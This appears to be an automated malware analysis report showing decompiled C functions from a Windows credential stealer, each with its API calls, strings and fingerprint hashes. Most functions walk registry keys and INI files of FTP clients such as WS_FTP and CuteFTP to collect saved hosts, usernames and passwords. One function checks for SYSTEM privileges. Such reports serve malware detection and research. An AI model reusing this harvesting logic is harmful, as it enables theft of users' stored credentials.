APIs

RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00410BE4), ref: 00402045
RegEnumKeyExA.ADVAPI32 ref: 00402085
lstrlenA.KERNEL32(?,00000000,00000000,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000), ref: 00402138
lstrlenA.KERNEL32(?,80000002,?,DisplayName,?,?,00000000,?,00000000,80000002,?,UninstallString,?,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall), ref: 00402171

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

RegCloseKey.ADVAPI32(00410BE4,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004021A8
GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 004021D4
GlobalLock.KERNEL32 ref: 00402204
GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 00402223
GetHGlobalFromStream.OLE32(?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,00410BE4), ref: 00402235
GlobalLock.KERNEL32 ref: 00402265
GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,?), ref: 00402284

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0040203B, 00402097
DisplayName, xrefs: 0040210D
UninstallString, xrefs: 004020CD

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 4234118056-981893429
Opcode ID: f9bd6954dfc5f31b935a3032c7154f81423a94a048844a08175558ec570958a2
Instruction ID: cdaa908c494aa76102f7c826ddf0691054428348d69886b20b68bb6d83f450db
Opcode Fuzzy Hash: f9bd6954dfc5f31b935a3032c7154f81423a94a048844a08175558ec570958a2
Instruction Fuzzy Hash: AA613E71900158BADB31AB62CD46BEA7679AB04344F0040FBB688F11F1D6BD5EC4AF68

Uniqueness

Uniqueness Score: -1.00%

Function 00402B27, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00402B27(void* __eax, void* __edx) {
				void* _v8;
				long _v12;
				void* _v16;
				CHAR* _v20;
				int _t26;
				int _t32;
				int _t39;
				void* _t42;

				if( *0x41440d != 0 &&  *0x414415 != 0 &&  *0x414419 != 0) {
					_t42 = 0;
					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
						_v12 = 0;
						_t26 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
						if(_t26 == 0 && GetLastError() == 0x7a && _v12 != 0) {
							_v16 = E004017EC(_v12);
							_t32 = GetTokenInformation(_v8, 1, _v16, _v12,  &_v12); // executed
							if(_t32 != 0) {
								_push( &_v20);
								_push( *_v16);
								if( *0x414419() != 0) {
									_t39 = lstrcmpA(_v20, "S-1-5-18"); // executed
									if(_t39 == 0) {
										_t42 = 1;
									}
									LocalFree(_v20);
								}
							}
							E004017D5(_v16);
						}
						CloseHandle(_v8);
					}
					return _t42;
				} else {
					return 0;
				}
			}

APIs

GetCurrentProcess.KERNEL32 ref: 00402B56
OpenProcessToken.ADVAPI32(00000000,00000008,00410B87), ref: 00402B62
GetTokenInformation.KERNELBASE(00410B87,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00402B84
GetLastError.KERNEL32 ref: 00402B8E
GetTokenInformation.KERNELBASE(00410B87,00000001(TokenIntegrityLevel),?,00000000,00000000,00000000), ref: 00402BB8
ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00402BCC
lstrcmpA.KERNEL32(?,S-1-5-18,?,?), ref: 00402BDE
LocalFree.KERNEL32(?,?,S-1-5-18,?,?), ref: 00402BEB
CloseHandle.KERNEL32(00410B87), ref: 00402BFB

Strings

S-1-5-18, xrefs: 00402BD6

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorFreeHandleLastLocalOpenStringlstrcmp
String ID: S-1-5-18
API String ID: 795010888-4289277601
Opcode ID: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
Instruction ID: 29f45c5e056208b681b019c64babcbd0cb81e3e7f6b38da6c0e7be3b0a9b4890
Opcode Fuzzy Hash: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
Instruction Fuzzy Hash: D5218331A10209ABDF119FA4DD8ABEE7775BB40308F148576B110B51E1DBB8AA90DB4C

Uniqueness

Uniqueness Score: -1.00%

Function 004064BB, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064BB(void* __ecx, intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				int* _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				char _v2092;
				int* _v2096;
				char _v2100;
				char _v2104;
				long _t62;
				long _t63;
				intOrPtr* _t78;
				intOrPtr* _t82;

				_t62 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t63 = _t62;
				if(_t63 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password",  &_v2104);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "Host", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "Login", 0);
						_v2084 = E00401C8E( *0x4140fe, _v2068, "InitialPath", 0);
						_t78 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2092);
						if(_t78 == 0 || _v2092 != 4) {
							_v2088 = 0x15;
						} else {
							 *_t24 =  *_t78;
						}
						E004017D5(_t78);
						_t82 = E00401C8E( *0x4140fe, _v2068, "PasswordType",  &_v2100);
						if(_t82 == 0 || _v2100 != 4) {
							_v2096 = 0;
						} else {
							 *_t29 =  *_t82;
						}
						E004017D5(_t82);
						if(_v2080 != 0 && _v2096 == 2 && (E004041BC(_v2080,  &_v2104, 0) == 0 || _v2104 == 0)) {
							E004017D5(_v2080);
							_v2080 = 0;
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0002);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014BC(_a4, _v2080, _v2104);
							E00401486(_a4, _v2088);
							E004014E8(_a4, _v2084);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2084);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t63;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 004064D1
RegEnumKeyExA.ADVAPI32 ref: 00406505
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406738

Strings

InitialPath, xrefs: 00406596
Port, xrefs: 004065B9
Password, xrefs: 0040653C
Login, xrefs: 00406578
Host, xrefs: 0040655A
PasswordType, xrefs: 004065FD

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$InitialPath$Login$Password$PasswordType$Port
API String ID: 1332880857-4069465341
Opcode ID: 80731490caea3ff90da39b54fdb199bc9ec81c0457b14d07f2172303205ba02b
Instruction ID: 8a8b12953b7785bcc2616ac66f0380b51c334fa7c9da36678472f7619d2a13f1
Opcode Fuzzy Hash: 80731490caea3ff90da39b54fdb199bc9ec81c0457b14d07f2172303205ba02b
Instruction Fuzzy Hash: 8F51F43194012CEADF226B52CC42BD9BAB9BF04704F14C0BAA549750B1DB7A4EA1DFD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0D7, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D0D7(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				char _v16;
				int _v20;
				char _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				char _v2096;
				intOrPtr _v2100;
				long _t68;
				long _t69;
				intOrPtr* _t84;
				void* _t108;

				_t108 = __ecx;
				_t68 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t69 = _t68;
				if(_t69 == 0) {
					_v12 = 0;
					while(1) {
						_v20 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v20, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2072 = E00401D15(E00401D15(_a12, "\\"),  &_v2068);
						E004017D5(_t74);
						_v2092 = E00401C8E(_a8, _v2072, "Password",  &_v16);
						_v2076 = E00401C8E(_a8, _v2072, "ServerName", 0);
						_v2080 = E00401C8E(_a8, _v2072, "UserID", 0);
						_t84 = E00401C8E(_a8, _v2072, "PortNumber",  &_v2096);
						if(_t84 == 0 || _v2096 != 4) {
							_t85 = _t84;
							if(_t84 != 0) {
								E004017D5(_t85);
							}
							_v2084 = 0x15;
						} else {
							 *_t27 =  *_t84;
							E004017D5(_t84);
						}
						_v2088 = E00401C8E(_a8, _v2072, "InitialDirectory", 0);
						_v2100 = E00401C8E(_a8, _v2072, "ServerType", 0);
						if(_v2092 != 0 && E004041BC(_v2092,  &_v16, 0x41603f) != 0 && _v16 != 0 && _v2080 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0010);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E004014BC(_a4, _v2092, _v16);
							E00401486(_a4, _v2084);
							E004014E8(_a4, _v2088);
							E004014E8(_a4, _v2100);
						}
						E004017D5(_v2092);
						E004017D5(_v2076);
						E004017D5(_v2088);
						E004017D5(_v2080);
						E004017D5(_v2100);
						E0040D0D7(_t108, _a4, _a8, _v2072);
						E004017D5(_v2072);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t69;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D0EA
RegEnumKeyExA.ADVAPI32 ref: 0040D11E
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D327

Strings

Password, xrefs: 0040D158
ServerType, xrefs: 0040D20F
ServerName, xrefs: 0040D173
PortNumber, xrefs: 0040D1AE
InitialDirectory, xrefs: 0040D1F4
UserID, xrefs: 0040D18E

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
API String ID: 1332880857-2649023343
Opcode ID: 88dc1074fb5cc77b61c74f26116f05aa703dde468a501575c52eb2f362b694c4
Instruction ID: f38a5596ae9a773ac0d22796df066d347c720fe0787782128e341da31621acfc
Opcode Fuzzy Hash: 88dc1074fb5cc77b61c74f26116f05aa703dde468a501575c52eb2f362b694c4
Instruction Fuzzy Hash: 5851B43194011CBADF226F91CC42BDD7AB9BF08314F14C0BAB548750B1DF7A9A95AF98

Uniqueness

Uniqueness Score: -1.00%

Function 004079E2, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004079E2(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				char _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				intOrPtr* _v2096;
				char _v2100;
				long _t66;
				long _t67;
				intOrPtr* _t82;

				_t66 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t67 = _t66;
				if(_t67 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t72);
						_v2080 = E00401C8E(_a8, _v2068, "Password", 0);
						_v2072 = E00401C8E(_a8, _v2068, "HostName", 0);
						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
						_v2088 = E00401C8E(_a8, _v2068, "RemoteDirectory", 0);
						_t82 = E00401C8E( *0x4140fe, _v2068, "PortNumber",  &_v2084);
						if(_t82 == 0 || _v2084 != 4) {
							_t83 = _t82;
							if(_t82 != 0) {
								E004017D5(_t83);
							}
							_v2092 = 0x15;
						} else {
							 *_t28 =  *_t82;
							E004017D5(_t82);
						}
						_v2096 = E00401C8E(_a8, _v2068, "FSProtocol",  &_v2100);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0010);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E00401486(_a4, _v2092);
							E004014E8(_a4, _v2088);
							if(_v2096 == 0 || _v2100 != 4) {
								E00401486(_a4, 0);
							} else {
								E00401486(_a4,  *_v2096);
							}
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2088);
						E004017D5(_v2096);
						E004079E2(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t67;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004079F5
RegEnumKeyExA.ADVAPI32 ref: 00407A29
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C3F

Strings

Password, xrefs: 00407A61
FSProtocol, xrefs: 00407B20
RemoteDirectory, xrefs: 00407AB2
UserName, xrefs: 00407A97
HostName, xrefs: 00407A7C
PortNumber, xrefs: 00407AD2

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
API String ID: 1332880857-3874328862
Opcode ID: e7dcc81a1872de75ef4e3cd078b4c75d1f19b2552471e3a295db8d28e704e3f1
Instruction ID: fd264f026befac884e31df10338c99dd76bd249b7adf4ed45f8ce47fce3a56bd
Opcode Fuzzy Hash: e7dcc81a1872de75ef4e3cd078b4c75d1f19b2552471e3a295db8d28e704e3f1
Instruction Fuzzy Hash: 3451E73194411CEADF22AF61CC42BDD7AB5BF04308F10C0BAB548751B1DB7AAA919F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCC7, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DCC7(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				char* _v2092;
				intOrPtr _v2096;
				char _v2100;
				long _t67;
				long _t68;

				_t67 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t68 = _t67;
				if(_t68 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2092 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t73);
						_v2068 = E00401C8E(_a4, _v2092, "FTP destination server", 0);
						_v2072 = E00401C8E(_a4, _v2092, "FTP destination user", 0);
						_v2076 = E00401C8E(_a4, _v2092, "FTP destination password", 0);
						_v2080 = E00401C8E(_a4, _v2092, "FTP destination port",  &_v2088);
						_v2084 = E00401C8E(_a4, _v2092, "FTP destination catalog", 0);
						_v2096 = E00401C8E(_a4, _v2092, "FTP profiles",  &_v2100);
						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a12, 0xbeef0000);
							E004014E8(_a12, _v2068);
							E004014E8(_a12, _v2072);
							E004014E8(_a12, _v2076);
							E004014BC(_a12, _v2080, _v2088);
							E004014E8(_a12, _v2084);
						}
						if(_v2100 != 0) {
							E00401486(_a12, 0xbeef0001);
							E004014BC(_a12, _v2096, _v2100);
						}
						E0040DCC7(_a4, _v2092, _a12);
						E004017D5(_v2092);
						E004017D5(_v2068);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2080);
						E004017D5(_v2084);
						E004017D5(_v2096);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t68;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DCDA
RegEnumKeyExA.ADVAPI32 ref: 0040DD0E
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DEF7

Strings

FTP destination password, xrefs: 0040DD7C
FTP profiles, xrefs: 0040DDD7
FTP destination server, xrefs: 0040DD46
FTP destination port, xrefs: 0040DD9C
FTP destination user, xrefs: 0040DD61
FTP destination catalog, xrefs: 0040DDB7

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
API String ID: 1332880857-3620412361
Opcode ID: 35e9ed3ed1a003a67f34f22080199be6ed32246e6094e5c65f352b80361faa11
Instruction ID: c7e1c623c9d0911d9fb61fdd086df822930df8ad3d0878dbfe468f7a3020db9c
Opcode Fuzzy Hash: 35e9ed3ed1a003a67f34f22080199be6ed32246e6094e5c65f352b80361faa11
Instruction Fuzzy Hash: 2F51743194011CBADF226F91CC42BDD7AB6BF04304F1080BAB548751B1DF7A9AA5AFD8

Uniqueness

Uniqueness Score: -1.00%

Function 00407D34, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407D34(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				char _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				intOrPtr _v2096;
				long _t63;
				long _t64;

				_t63 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t64 = _t63;
				if(_t64 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t69);
						_v2080 = E00401C8E(_a8, _v2068, "PassWord",  &_v2084);
						_v2072 = E00401C8E(_a8, _v2068, "Url", 0);
						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
						_v2088 = E00401C8E(_a8, _v2068, "RootDirectory", 0);
						_v2092 = E00401C8E(_a8, _v2068, "Port", 0);
						_v2096 = E00401C8E(_a8, _v2068, "ServerType", 0);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0010);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014BC(_a4, _v2080, _v2084);
							E004014E8(_a4, _v2092);
							E004014E8(_a4, _v2088);
							E004014E8(_a4, _v2096);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2088);
						E004017D5(_v2092);
						E004017D5(_v2096);
						E00407D34(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t64;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407D47
RegEnumKeyExA.ADVAPI32 ref: 00407D7B
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F43

Strings

UserName, xrefs: 00407DEE
PassWord, xrefs: 00407DB8
ServerType, xrefs: 00407E3F
Url, xrefs: 00407DD3
Port, xrefs: 00407E24
RootDirectory, xrefs: 00407E09

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
API String ID: 1332880857-2128033141
Opcode ID: 5d272c304e27db9f029665910115d696e7e15bd5ee73f67f691d4abd95bb4687
Instruction ID: 4eb3fcfc5343b041dd0bd68344c2513e02b84b383dc5ec38f59f6f48277349fc
Opcode Fuzzy Hash: 5d272c304e27db9f029665910115d696e7e15bd5ee73f67f691d4abd95bb4687
Instruction Fuzzy Hash: 6251723194011CBADF226F61CC42BED7AB6BF04304F14C0BAB558750B1DB7A5EA1AF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404E40, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E40(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				CHAR* _v276;
				int _t24;
				void* _t25;
				void* _t26;
				long _t37;
				long _t40;
				void* _t47;
				void* _t48;

				_t48 = __edx;
				_t47 = __ecx;
				_v8 = E0040150D(_a4, 3, 0);
				_t24 = GetWindowsDirectoryA( &_v269, 0x104);
				if(_t24 != 0 && _t24 <= 0x104) {
					_v276 = E00401D15( &_v269, "\\win.ini");
					_t37 = GetPrivateProfileStringA("WS_FTP", "DIR", 0x4140dc,  &_v269, 0x104, _v276); // executed
					if(_t37 != 0) {
						E00404C68(_t47, _a4,  &_v269, 0);
					}
					_t40 = GetPrivateProfileStringA("WS_FTP", "DEFDIR", 0x4140dc,  &_v269, 0x104, _v276); // executed
					_t52 = _t40;
					if(_t40 != 0) {
						E00404C68(_t47, _a4,  &_v269, 0);
					}
					E004017D5(_v276);
				}
				_t25 = E00401DCE(_t52, 0x2b); // executed
				_t26 = _t25;
				_t53 = _t26;
				if(_t26 != 0) {
					E00404C68(_t47, _a4, E00401D69(_t26, "\\Ipswitch\\WS_FTP"), 0); // executed
					E004017D5(_t31);
				}
				E00404DF4(_t47, _t53, _a4, 0x1a, "\\Ipswitch"); // executed
				E00404DF4(_t47, _t53, _a4, 0x23, "\\Ipswitch"); // executed
				E00404DF4(_t47, _t53, _a4, 0x1c, "\\Ipswitch"); // executed
				return E00401553(_t48, _t53, _a4, _v8);
			}

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00404E64

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,004140DC,?,00000104,?), ref: 00404EB4
GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,004140DC,?,00000104,?), ref: 00404EEF

Strings

DEFDIR, xrefs: 00404EE5
\Ipswitch\WS_FTP, xrefs: 00404F1F
\Ipswitch, xrefs: 00404F3B, 00404F4A, 00404F59
WS_FTP, xrefs: 00404EAF, 00404EEA
\win.ini, xrefs: 00404E7C
DIR, xrefs: 00404EAA

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
API String ID: 2508676433-45949541
Opcode ID: 8c32303686343bb50af495e6a366aa92cae66f3871f80159bea9ed8e1db5892c
Instruction ID: e00d4702d6b83cfd5b79c7bbcdca918ca21af511ae28e9f1c251b88d42575b58
Opcode Fuzzy Hash: 8c32303686343bb50af495e6a366aa92cae66f3871f80159bea9ed8e1db5892c
Instruction Fuzzy Hash: 452188B17902087ADF117AA1CC43FDA3A299F94744F1040777704B40E2EBFC9AC09A6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA6C, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040EA6C(void* __eflags, void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				CHAR* _v2076;
				long _t33;
				CHAR* _t48;
				long _t49;

				_v2076 = E004017EC(0x105);
				_t33 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				if(_t33 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t40);
						_v2072 = E00401C8E(_a4, _v2068, "Path", 0);
						__eflags = _v2072;
						if(__eflags != 0) {
							_t48 = E00401D15(_v2072, "\\PocoSystem.ini");
							_push(_t48);
							_t49 = GetPrivateProfileStringA("Program", "DataPath", 0x4140dc, _v2076, 0x104, _t48);
							__eflags = _t49 - 3;
							if(_t49 > 3) {
								E00404131(_a12, _v2076, "accounts.ini", 0xbeef0000);
							}
							E004017D5();
						}
						E0040EA6C(__eflags, _a4, _v2068, _a12);
						E004017D5(_v2068);
						E004017D5(_v2072);
						_v12 = _v12 + 1;
					}
					RegCloseKey(_v8);
				}
				return E004017D5(_v2076);
			}

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EA8F
RegEnumKeyExA.ADVAPI32 ref: 0040EAC3
GetPrivateProfileStringA.KERNEL32(Program,DataPath,004140DC,?,00000104,00000000), ref: 0040EB49
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040EBA2

Strings

Program, xrefs: 0040EB44
\PocoSystem.ini, xrefs: 0040EB1D
DataPath, xrefs: 0040EB3F
accounts.ini, xrefs: 0040EB58
Path, xrefs: 0040EAFB

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocCloseEnumLocalOpenPrivateProfileString
String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
API String ID: 1343824468-2495907966
Opcode ID: 4bc298418ff4aa406a7d4810b31869608f08b7aeec5db9d70fc2ff6b34816087
Instruction ID: 122af7354ceea1c80e976d98240d1f1ab236dc4a71dce6b0bb6b8652a25f0c4c
Opcode Fuzzy Hash: 4bc298418ff4aa406a7d4810b31869608f08b7aeec5db9d70fc2ff6b34816087
Instruction Fuzzy Hash: 29312D7194011CBADF11ABA2CC42FDD7AB9BF04304F1084B7B245751E1DAB95AE19F9C

Uniqueness

Uniqueness Score: -1.00%

Function 004051B8, Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004051B8(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _t30;
				void* _t37;
				void* _t38;
				char* _t39;

				_t38 = __edx;
				_t37 = __ecx;
				_v8 = E0040150D(_a4, 4, 0);
				_t39 =  *0x414082; // 0x0
				if( *_t39 == 0) {
					L5:
					E0040510F(_t37, _t43, _a4, 0x1a); // executed
					E0040510F(_t37, _t43, _a4, 0x23); // executed
					E0040510F(_t37, _t43, _a4, 0x1c); // executed
					E0040510F(_t37, _t43, _a4, 0x26); // executed
					E00404F8E(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar"); // executed
